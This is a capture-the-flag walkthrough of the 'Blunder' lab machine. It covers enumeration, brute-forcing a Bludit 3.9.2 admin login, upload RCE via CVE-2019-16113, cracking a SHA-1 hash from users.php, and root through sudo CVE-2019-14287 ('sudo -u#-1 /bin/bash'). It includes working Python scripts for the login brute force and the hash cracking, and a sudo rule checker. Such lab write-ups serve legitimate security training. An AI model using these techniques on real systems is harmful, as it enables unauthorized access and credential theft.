Blunder
Information:
OS: Linux
Difficulty: Easy
IP: 10.10.10.191
Enumeration
NMAP
nmap -sC -sS -sV -O -A -v -v 10.10.10.191
output:
Let's check the website (Apache 2 running on port 80).
Apparently it is a site about interesting facts.
Looking at the page source code we see:
and this caught my attention:
We know the version is 3.9.2, but we still need to find out which CMS it is.
Fuzzing the web root turns up some paths containing "bl-kernel".
Searching this structure I found:
OK, the site runs Bludit 3.9.2.
We can try an exploit for CVE-2019-16113 (authenticated file upload in Bludit 3.9.2) and get RCE (Remote Code Execution).
BUT
this exploit needs a valid username and password, which we do not know yet,
so let's find them.
For this, we can use:
code:
This script takes a wordlist and tries every word as the password until one logs in.
But we still need the username...
Returning to the enumeration stage, we find a file named "todo.txt".
Now we know there is a user called fergus.
Now let's test passwords.
To generate a password list that makes sense for this target, I will use a tool called "cewl", which scrapes the words from a site and assembles them into a list:
cewl 10.10.10.191 -w wordlist.txt
Now let's use that script to find the password:
python3 10.10.10.191 fergus wordlist.txt
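Since the script itself only appears as a screenshot, here is an equivalent dictionary attack against the Bludit admin login, added as an example (it is not the script used on the page). It assumes the form details of Bludit 3.x: the login page is /admin/, it carries a hidden tokenCSRF field, the POST fields are tokenCSRF, username, password and save, a successful login redirects to /admin/dashboard, and the application answers "IP address has been blocked" once its login lockout triggers. When that message shows up the script stops instead of burning more attempts.

```python
#!/usr/bin/env python3
"""Dictionary attack against a Bludit 3.x admin login form (added example)."""
import http.cookiejar
import re
import sys
import urllib.parse
import urllib.request

# Assumed form details (not taken from the original page): adjust these if the
# target's login page differs.
LOGIN_PATH = "/admin/"
CSRF_RE = re.compile(r'name="tokenCSRF"[^>]*value="([^"]+)"')
FAIL_MARKER = "Username or password incorrect"
BLOCK_MARKER = "IP address has been blocked"
SUCCESS_URL_PART = "/admin/dashboard"


def extract_csrf_token(html):
    """Return the tokenCSRF value from the login page, or None if absent."""
    m = CSRF_RE.search(html)
    return m.group(1) if m else None


def classify_response(html, final_url):
    """Map a login response to 'blocked', 'success' or 'failed'."""
    if BLOCK_MARKER in html:
        return "blocked"
    if SUCCESS_URL_PART in final_url:
        return "success"
    return "failed"


def build_login_body(token, username, password):
    """URL-encode the POST body the login form submits."""
    return urllib.parse.urlencode({
        "tokenCSRF": token,
        "username": username,
        "password": password,
        "save": "",
    }).encode()


def try_password(base_url, username, password):
    """One login attempt in a fresh session (the CSRF token is tied to the
    session cookie, so each attempt fetches its own token)."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    login_url = base_url.rstrip("/") + LOGIN_PATH
    with opener.open(login_url, timeout=10) as r:
        token = extract_csrf_token(r.read().decode(errors="replace"))
    if token is None:
        raise RuntimeError("no tokenCSRF field on the login page")
    req = urllib.request.Request(login_url, data=build_login_body(token, username, password))
    with opener.open(req, timeout=10) as r:  # urllib follows the redirect
        return classify_response(r.read().decode(errors="replace"), r.geturl())


def run_wordlist(base_url, username, candidates, attempt=try_password):
    """Try each candidate and return the first that logs in, or None.
    `attempt` is injectable so the loop can be exercised without a network."""
    for pw in candidates:
        pw = pw.strip()
        if not pw:
            continue
        result = attempt(base_url, username, pw)
        if result == "success":
            return pw
        if result == "blocked":
            raise RuntimeError("login blocked by the application; stop and wait")
    return None


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} http://host user wordlist.txt")
    with open(sys.argv[3], encoding="utf-8", errors="ignore") as f:
        found = run_wordlist(sys.argv[1], sys.argv[2], f)
    print(f"password: {found}" if found else "no match in wordlist")
```

Run it as "python3 bludit_login.py http://10.10.10.191 fergus wordlist.txt" with the cewl output; each attempt uses a new cookie jar, which matters because Bludit binds the CSRF token to the session.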
Finally, we have the password. Now use the exploit for CVE-2019-16113.
Getting Shell
Now we have a shell, but a very bad one.
Improving this shell
To improve it, we make this connection spawn another shell. For this we use:
(changing the IP)
(on the right screen we have the better shell, but still not a TTY)
To get a TTY, run the command:
python -c 'import pty;pty.spawn("/bin/bash")'
Now we have to get access to another user (www-data does not have access to the user flag).
Looking through the files www-data can read, I found:
/var/www/bludit-3.10.0a/bl-content/databases/users.php
Here we see the user (hugo) and his password hash.
Now let's crack the hash.
First we need to find out which hash algorithm was used;
for this I will use a site called tunnelsup:
https://www.tunnelsup.com/hash-analyzer/
Cracking it (https://www.dcode.fr/sha1-hash):
Now we have the password, let's switch to that user with su.
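The same two steps (identify the hash, then look it up against a wordlist) can be done offline. The script below is an added example, not from the page, and it assumes the Bludit users.php layout: a one-line PHP guard followed by a JSON document in which each user's "password" field is sha1(password + salt) with the salt stored beside it (on this box the page's screenshots only show a bare SHA-1, which is the empty-salt case). The users.php content, the users and the wordlist are constructed for the demo.

```python
#!/usr/bin/env python3
"""Identify and crack the password hashes in a Bludit users.php (added example)."""
import hashlib
import json

# Bludit writes users.php as a PHP guard line followed by JSON; the hash is
# assumed to be sha1(password + salt) (assumption, not stated on the page).
PHP_GUARD = "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n"

# Constructed sample, not the file from the target. "alice" has an empty salt
# and the well-known SHA-1 of the word "password"; "bob" has a salt.
SAMPLE_USERS_PHP = PHP_GUARD + json.dumps({
    "alice": {"nickname": "Alice", "role": "author",
              "password": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8", "salt": ""},
    "bob": {"nickname": "Bob", "role": "editor",
            "password": hashlib.sha1(b"winter2019" + b"x9Qz").hexdigest(), "salt": "x9Qz"},
})

# Hex-digest length -> most likely unsalted digest family, the same heuristic
# the online hash analyzers apply.
HASH_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def parse_users_php(text):
    """Drop the PHP guard and parse the JSON user table."""
    end = text.find("?>")
    body = text[end + 2:] if end != -1 else text
    return json.loads(body)


def identify_hash(h):
    """Guess the digest family from the hex length; 'unknown' if not hex."""
    h = h.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return "unknown"
    return HASH_LENGTHS.get(len(h), "unknown")


def crack_sha1(target_hex, salt, candidates):
    """Return the candidate with sha1(candidate + salt) == target, else None."""
    target = target_hex.strip().lower()
    for cand in candidates:
        cand = cand.strip()
        if cand and hashlib.sha1((cand + salt).encode()).hexdigest() == target:
            return cand
    return None


def crack_users(users, wordlist):
    """Map each username to its recovered password, or None when no word matches
    or the stored value is not a SHA-1 hex digest."""
    wordlist = list(wordlist)  # may be reused for every user
    result = {}
    for name, info in users.items():
        if identify_hash(info.get("password", "")) != "SHA-1":
            result[name] = None
            continue
        result[name] = crack_sha1(info["password"], info.get("salt", ""), wordlist)
    return result


if __name__ == "__main__":
    WORDLIST = ["123456", "password", "winter2019", "letmein"]  # constructed
    users = parse_users_php(SAMPLE_USERS_PHP)
    for name, pw in crack_users(users, WORDLIST).items():
        print(f"{name}: {identify_hash(users[name]['password'])} -> {pw}")
```

To use it on a real file, read users.php from the target into parse_users_php() and pass a proper wordlist such as rockyou.txt to crack_users(); a non-empty "salt" field is why a plain SHA-1 lookup site can fail even when the password is in its database.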
Privilege Escalation
Running
sudo -l
to see which commands we may run through sudo, we see that the hugo user can run /bin/bash as any user except root: "(ALL, !root) /bin/bash".
Searching for this rule, we find that it is exploitable: sudo versions before 1.8.28 (CVE-2019-14287) accept a numeric user ID of -1 ("sudo -u#-1 /bin/bash"), which passes the "!root" check because -1 is not uid 0, yet the process stays uid 0 because setuid(-1) changes nothing. So check the version with "sudo -V" first; if it is older than 1.8.28, the rule gives us root.
Let's use it.
I will download the script to my machine, start a Python HTTP server in that folder, and then download it from my IP on the target machine.
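Before fetching any exploit script, it is worth confirming both conditions on the target: the "!root" rule and a sudo older than 1.8.28. The check below is an added example (not the script downloaded on the page); it parses the output of "sudo -V" and "sudo -l" and lists the commands that can be tried with "sudo -u#-1". The sample outputs are constructed to mirror what the page describes.

```python
#!/usr/bin/env python3
"""Pre-flight check for the (ALL, !root) sudo rule before abusing it (added example)."""
import re
import subprocess

# sudo's -u#-1 bug (CVE-2019-14287) was fixed in sudo 1.8.28.
FIXED_IN = (1, 8, 28)

# Constructed samples standing in for `sudo -V` and `sudo -l` on a target.
SAMPLE_SUDO_V = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""

VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")
# A sudoers rule line: "(runas spec) [TAG:] command"; we only keep specs that
# exclude root, which is the shape the -u#-1 trick bypasses.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*!root[^)]*)\)\s+(?P<cmd>\S.*)$", re.M)
TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")  # strips NOPASSWD: / SETENV: prefixes


def parse_sudo_version(text):
    """Return (major, minor, patch) from `sudo -V` output; 'p' suffixes are ignored."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())


def version_vulnerable(version):
    """True when the version predates the 1.8.28 fix."""
    return version < FIXED_IN


def not_root_rules(sudo_l_text):
    """Return [(runas_spec, command)] for rules whose runas spec excludes root."""
    return [(m.group("runas"), TAG_RE.sub("", m.group("cmd")).strip())
            for m in RULE_RE.finditer(sudo_l_text)]


def assess(sudo_v_text, sudo_l_text):
    """Commands worth trying as `sudo -u#-1 <cmd>`, or [] if not exploitable."""
    if not version_vulnerable(parse_sudo_version(sudo_v_text)):
        return []
    return [cmd for _, cmd in not_root_rules(sudo_l_text)]


def assess_this_host():
    """Run the real commands on the current machine (sudo -l may ask for the
    user's password, which is what hugo has)."""
    v = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    rules = subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout
    return assess(v, rules)


if __name__ == "__main__":
    for cmd in assess(SAMPLE_SUDO_V, SAMPLE_SUDO_L):
        print(f"try: sudo -u#-1 {cmd}")
```

On the box, call assess_this_host() instead of the constructed samples; an empty list means either the sudo binary is already patched or no rule excludes root, and the downloaded script will not help.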
Now we are root; just grab the flag.